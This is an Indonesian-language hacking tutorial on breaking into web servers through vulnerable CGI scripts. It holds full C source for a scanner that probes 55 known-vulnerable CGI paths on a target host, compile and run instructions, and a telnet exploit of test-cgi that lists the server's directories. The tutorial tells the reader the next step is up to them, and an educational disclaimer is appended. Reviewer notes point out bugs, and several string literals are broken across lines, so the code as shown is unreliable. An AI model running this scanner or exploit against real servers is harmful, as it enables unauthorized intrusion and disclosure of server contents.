Menjebol Apache web server melalui test-cgi. Langsung saja: pertama, yang perlu kita persiapkan adalah scanner untuk melihat vulnerability dari web tersebut. Di sini saya sertakan juga source programnya, dalam C.
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RMT_PORT 80 /* TCP port every connection in main() is made to */
#define OXO 1 /* exit status used on every error path in main() */
#define LOOK "200 OK" /* substring searched for in the first received chunk; its presence alone decides a "found" result */
#define OUT_FILE "DOuiD.cgi" /* results file; opened in append mode by main(), hits are appended to it */
/*
 * Entry point of the scanner. Expects exactly one argument, a host name,
 * which is resolved with gethostbyname(); a fresh TCP connection to
 * RMT_PORT is then opened for each entry of cgi[], the request string is
 * sent, a single recv() is done, and the reply is treated as a hit if it
 * contains LOOK. Hits are also appended to OUT_FILE.
 *
 * NOTE(review): `main` is declared without a return type (implicit int),
 * which C89 allowed but C99 and later reject.
 */
main(int argc, char *argv[])
{
struct sockaddr_in rmt_host; /* peer address, filled in inside the loop */
struct hostent *rh; /* result of gethostbyname(argv[1]) */
FILE *f; /* OUT_FILE, opened in append mode */
char buffer1[BUFSIZ]; /* receive buffer; cleared once before the loop, not per reply */
char buffer2[BUFSIZ]; /* cleared below but otherwise unused in this function */
char *cgi[100]; /* request strings, indexed from 1 (You Can Change It Of Course) */
char *name[100]; /* display label for each cgi[] entry, same index */
int sock,i=1;
/* NOTE(review): these two memsets clear 100 bytes, but each array holds
 * 100 pointers (sizeof cgi is larger than 100), so only the leading
 * entries are actually zeroed. */
memset(cgi,0,100);
memset(name,0,100);
memset(buffer1,0,BUFSIZ);
memset(buffer2,0,BUFSIZ);
/* Request line sent for each probe; entries are indexed from 1 */
cgi[1] = "GET /cgi-bin/phf SH \n\n";
cgi[2] = "GET /cgi-bin/test-cgi SH \n\n";
cgi[3] = "GET /cgi-bin/nph-test-cgi SH \n\n";
cgi[4] = "GET /cgi-bin/whois_raw.cgi SH \n\n";
cgi[5] = "GET /cgi-bin/Count.cgi SH \n\n";
cgi[6] = "GET /cgi-bin/search/tidfinder.cgi SH \n\n";
cgi[7] = "GET /cgi-bin/finger SH \n\n";
cgi[8] = "GET /cgi-bin/tablebuild.pl SH \n\n";
cgi[9] = "GET /cgi-bin/displayTC.pl SH \n\n";
cgi[10] = "GET /cgi-bin/uptime SH \n\n";
/* NOTE(review): this literal is broken across two lines in the listing
 * and does not compile as shown; presumably an extraction artifact. */
cgi[11] = "GET /cgi-bin/cvsweb/src/usr.bin/rdist/expand.c SH
\n\n";
cgi[12] = "GET /cgi-bin/c_download.cgi SH \n\n";
cgi[13] = "GET /cgi-bin/program.pl SH \n\n";
cgi[14] = "GET /cgi-bin/ntitar.pl SH \n\n";
cgi[15] = "GET /cgi-bin/enter.cgi SH \n\n";
/* NOTE(review): cgi[15] is assigned twice; this second assignment wins,
 * so enter.cgi is never requested, name[15] ("enter.cgi ") mislabels the
 * query_string.cgi probe, and name[16] mislabels cgi[16] (AT-generate.cgi). */
cgi[15] = "GET /cgi-bin/query_string.cgi SH \n\n";
cgi[16] = "GET /cgi-bin/AT-generate.cgi SH \n\n";
cgi[17] = "GET /cgi-bin/test.html SH \n\n";
cgi[18] = "GET /cgi-bin/test-unix.html SH \n\n";
cgi[19] = "GET /cgi-bin/printenv SH \n\n";
cgi[20] = "GET /cgi-bin/dasp/fm_shell.asp SH \n\n";
cgi[21] = "GET /cgi-bin/wa SH \n\n";
cgi[22] = "GET /cgi-bin/visadmin.exe SH \n\n";
cgi[23] = "GET /cgi-bin/wguest.exe SH \n\n";
cgi[24] = "GET /cgi-bin/rguest.exe SH \n\n";
cgi[25] = "GET /cgi-bin/AnyForm2 SH \n\n";
cgi[26] = "GET /cgi-dos/args.bat SH \n\n";
cgi[27] = "GET /cgi-bin/perlshop.cgi SH \n\n";
cgi[28] = "GET /cgi-bin/edit.pl SH \n\n";
cgi[29] = "GET /cgi-bin/guestbook.cgi SH \n\n";
cgi[30] = "GET /cgi-bin/cgiwrap SH \n\n";
cgi[31] = "GET /cgi-bin/wrap SH \n\n";
cgi[32] = "GET /cgi-bin/environ.cgi SH \n\n";
cgi[33] = "GET /cgi-bin/classifieds.cgi SH \n\n";
cgi[34] = "GET /cgi-bin/textcounter.pl SH \n\n";
cgi[35] = "GET /cgi-win/uploader.exe SH \n\n";
cgi[36] = "GET /cgi-bin/nph-publish SH \n\n";
cgi[37] = "GET /cgi-bin/handler SH \n\n";
cgi[38] = "GET /cgi-bin/faxsurvey SH \n\n";
cgi[39] = "GET /cgi-bin/php.cgi SH \n\n";
cgi[40] = "GET /cgi-bin/wwwboard.pl SH \n\n";
cgi[41] = "GET /cgi-bin/websendmail SH \n\n";
cgi[42] = "GET /cgi-bin/rwwwshell.pl SH \n\n";
cgi[43] = "GET /cgi-bin/campas SH \n\n";
cgi[44] = "GET /cgi-bin/webdist.cgi SH \n\n";
cgi[45] = "GET /cgi-bin/aglimpse SH \n\n";
cgi[46] = "GET /cgi-bin/man.sh SH \n\n";
cgi[47] = "GET /cgi-bin/info2www SH \n\n";
cgi[48] = "GET /cgi-bin/jj SH \n\n";
cgi[49] = "GET /cgi-bin/files.pl SH \n\n";
cgi[50] = "GET /cgi-bin/maillist.pl SH \n\n";
cgi[51] = "GET /cgi-bin/filemail.pl SH \n\n";
cgi[52] = "GET /cgi-bin/bnbform.cgi SH \n\n";
cgi[53] = "GET /cgi-bin/survey.cgi SH \n\n";
cgi[54] = "GET /cgi-bin/glimpse SH \n\n";
/* NOTE(review): entry 55 is never sent; the loop below stops at i < 55. */
cgi[55] = "GET /cgi-bin/www-sql SH \n\n";
/* Labels printed for each probe (same index as cgi[]) */
name[1] = "phf ";
name[2] = "test-cgi ";
name[3] = "nph-test-cgi ";
name[4] = "whois_raw.cgi ";
name[5] = "Count.cgi ";
name[6] = "tidfinder.cgi ";
name[7] = "finger ";
name[8] = "tablebuild.pl ";
name[9] = "displayTC.pl ";
name[10] = "uptime ";
name[11] = "expand.c ";
name[12] = "c_download.cgi ";
name[13] = "program.pl ";
name[14] = "ntitar.pl ";
name[15] = "enter.cgi ";
name[16] = "query_tring.cgi ";
name[17] = "test.html ";
name[18] = "test-unix.html ";
name[19] = "printenv ";
name[20] = "fm_shell.asp ";
name[21] = "wa ";
name[22] = "visadmin.exe ";
name[23] = "wguest.exe ";
name[24] = "rguest.exe ";
name[25] = "AnyForm2 ";
name[26] = "args.bat ";
name[27] = "perlshop.cgi ";
name[28] = "edit.pl ";
name[29] = "guestbook ";
name[30] = "cgiwrap ";
name[31] = "wrap ";
name[32] = "environ.cgi ";
name[33] = "classifieds.cgi ";
name[34] = "textcounter.pl ";
name[35] = "uploader.exe ";
name[36] = "nph-publish ";
name[37] = "handler ";
name[38] = "faxsurvey ";
name[39] = "php.cgi ";
name[40] = "wwwboard.pl ";
name[41] = "websendmail ";
name[42] = "rwwwshwll ";
name[43] = "campas ";
name[44] = "webdist.cgi ";
name[45] = "aglimpse ";
name[46] = "man.sh ";
name[47] = "info2www ";
name[48] = "jj ";
name[49] = "files.pl ";
name[50] = "maillist.pl ";
name[51] = "filemail.pl ";
name[52] = "bnbform.cgi ";
name[53] = "survey.cgi ";
name[54] = "slinpse ";
name[55] = "www-sql ";
/* The results file is opened before the argument check, so a bad
 * invocation still creates or touches OUT_FILE in the working directory. */
if ((f=fopen(OUT_FILE,"a"))==NULL){
perror("fopen");
exit(OXO);
}
/* NOTE(review): nothing follows "%s" in the usage text; the host
 * placeholder may have been lost in extraction, as the #include lines
 * above were. */
if (argc != 2){
fprintf(stderr,"Usage: %s \ncgiS.c By ZinC_Sh(C).\n",argv[0]);
exit(OXO);
}
/* Only the first resolved address (h_addr) is used below. */
if ((rh=gethostbyname(argv[1])) == NULL){
perror("gethostbyname");
exit(OXO);
}
/* Banner. NOTE(review): the next two literals are broken across lines in
 * this listing and do not compile as shown; presumably an extraction
 * artifact. */
printf("\t\t\t\b\b------------------------\n");
printf("\t\t\t\b\b|\033[6;35m CGi Scaner V1.0.1 .-
\033[0m|\n");
printf("\t\t\t\b\b|\033[6;35m By Scorpionbugs(C).-
\033[0m|\n");
printf("\t\t\t\b\b------------------------\n\n");
/* One probe per iteration (i = 1..54): new socket, connect, send, single
 * recv, close. Only sin_zero is zeroed by bzero(); sin_family, sin_addr
 * and sin_port are set explicitly. A failed socket() or connect() exits
 * the whole program with OXO rather than skipping the entry. */
while (i < 55) { if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1){ perror("Socket"); exit(OXO); } bzero(&(rmt_host.sin_zero),8); rmt_host.sin_family = AF_INET; rmt_host.sin_addr = *((struct in_addr *)rh->h_addr);
rmt_host.sin_port = htons(RMT_PORT);
if (connect(sock,(struct sockaddr *) &rmt_host
,sizeof(rmt_host)) != 0){
perror("connect");
exit(OXO);
}
printf("LookinG For %s\b\b\b\bCGI in /cgi-bin/ :",name[i]);
/* NOTE(review): sizeof(cgi) is the byte size of the pointer array
 * (100 * sizeof(char *)), not strlen(cgi[i]); this reads past the end of
 * the string literal and transmits whatever memory follows it. */
send(sock,cgi[i],sizeof(cgi),0);
/* NOTE(review): the recv() return value is ignored, and buffer1 is neither
 * re-cleared per iteration nor NUL-terminated after the read, so the
 * strstr() below can match stale bytes from an earlier reply or run past
 * the buffer if a full BUFSIZ arrives. */
recv(sock,buffer1,sizeof(buffer1),0);
/* A hit is any first chunk containing LOOK ("200 OK"); a server that
 * answers 200 for unknown paths therefore reports every entry as found. */
if((strstr(buffer1,LOOK)) != 0){
printf("\t\033[1;32mCGI FounD !!!\033[0m\n");
/* The marker and the request text are written back to back with no
 * separator; cgi[i] itself ends in "\n\n". */
fputs("FounD !!!",f);
fputs(cgi[i],f);
} else {
printf("\tCGI NoT FounD.\n");
}
close(sock);
i++;
}
/* NOTE(review): this literal is also broken across lines in the listing. */
printf("\nKapUt !\nMay The Poula KApribekou Be With You...
(ZinC_Sh).\n");
printf("The Results Will Be Found In THe DOuiD.cgi File.\n");
fclose(f);
return 0;
}
cara compile : gcc cgis.c -o cgis
kalo udah di-compile, trus sekarang waktunya hack dengan sintaks
#cgis 10.1.xx.xx
looking for phf CGI in /cgi-bin/ : CGI Not Found
looking for test-cgi CGI in /cgi-bin/ : CGI Found !!!!
bla bla bla
bla bla
bla
Hasil scan-nya disimpan di file DOuiD.cgi; file ini sih cuma ngasih tahu aja hasil proses scan tersebut. Nah, di baris kedua kita bisa lihat ternyata cgi-bin/test-cgi ada dan open di web tersebut; selanjutnya tinggal kita telnet ke 10.1.xx.xx melalui port 80.
#telnet 10.1.xx.xx 80
Trying 10.1.xx.xx
Connected to 10.1.xx.xx Escape character is '^}'
GET /cgin-bin/test-cgi?/* report:argc is 1. argv is /\*.
SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO
= PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib
/mnt /root
/sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
Nah, di QUERY_STRING kita bisa lihat seluruh directory; selanjutnya terserah Anda. Saya menyarankan jangan mengubah atau mengganggu isi directory tersebut. Selamat mencoba.
INFORMASI di sini digunakan untuk tujuan pendidikan. Penulis tidak bertanggung jawab untuk penyalahgunaan informasi yang ada pada web ini. Gunakan segala bentuk informasi di sini secara bijak untuk melindungi diri Anda sendiri agar tidak menjadi korban internet.